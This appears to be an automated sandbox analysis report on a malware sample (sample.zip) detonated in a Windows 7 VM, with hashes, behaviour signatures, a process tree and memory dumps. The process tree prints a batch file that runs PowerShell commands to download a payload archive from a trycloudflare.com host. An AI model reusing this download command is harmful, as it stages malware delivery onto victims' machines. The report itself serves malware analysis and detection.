Analysis

  • max time kernel
    1563s
  • max time network
    1565s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-09-2024 13:58

General

  • Target

    sample.zip

  • Size

    42.8MB

  • MD5

    7579c349d3f04d81d16020218b4b014e

  • SHA1

    7299091625d2af8508e6c3e07e236ee47ac4400a

  • SHA256

    0366ac31796c460c24e7d71469e86f4c7e9509f3b52f4c24921d19d7b5786f16

  • SHA512

    6e7a4f071e8c74686d18892768e8158d00fba5bebad9bd0947374b08b79b7b0fa87f756618ad80ba5728db71db42a556fad990066f9d87232c0c2e35d00e3e94

  • SSDEEP

    786432:oDXXuerfHkIZf06hLwbl9Pm2TW38ZF+oxwk4fbSep82zpMN8:oDnXfHkIZcXM2TdZooxwnXWN8

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\sample.zip
    PID:1984
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      PID:1980
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x4e4
        • Suspicious use of AdjustPrivilegeToken
        PID:912
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\Documents\sample\corn.bat" "
        • Suspicious use of WriteProcessMemory
        PID:908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://myspace-step-singh-headers.trycloudflare.com/corn.zip' -OutFile 'C:\Users\Admin\Downloads\corn.zip' } catch { exit 1 }"
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1652
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://myspace-step-singh-headers.trycloudflare.com/corn.zip' -OutFile 'C:\Users\Admin\Downloads\corn.zip' } catch { exit 1 }"
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1508

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: 43139d7fa5f8f17cb66e698b3ab40005
    SHA1: ec9c2e3cc0ee7e0e2136dc96bd4402b461b8a64a
    SHA256: 7fd312245c16a943b83fab4698b6753fefb5a3a55e7b0fa6ff3fdfc6e1d93454
    SHA512: 3faf3801996afb60ad0d245fec488a5e96db8e3c4addf5c6a3a12f3053ad906a10ecb90fa7767b401081715493d993070df8e3fb8653e7cc7713eba14b34a568

  • memory/1508-11-0x000000001B680000-0x000000001B962000-memory.dmp
    Filesize: 2.9MB

  • memory/1508-12-0x00000000021E0000-0x00000000021E8000-memory.dmp
    Filesize: 32KB

  • memory/1652-4-0x000000001B6F0000-0x000000001B9D2000-memory.dmp
    Filesize: 2.9MB

  • memory/1652-5-0x0000000002960000-0x0000000002968000-memory.dmp
    Filesize: 32KB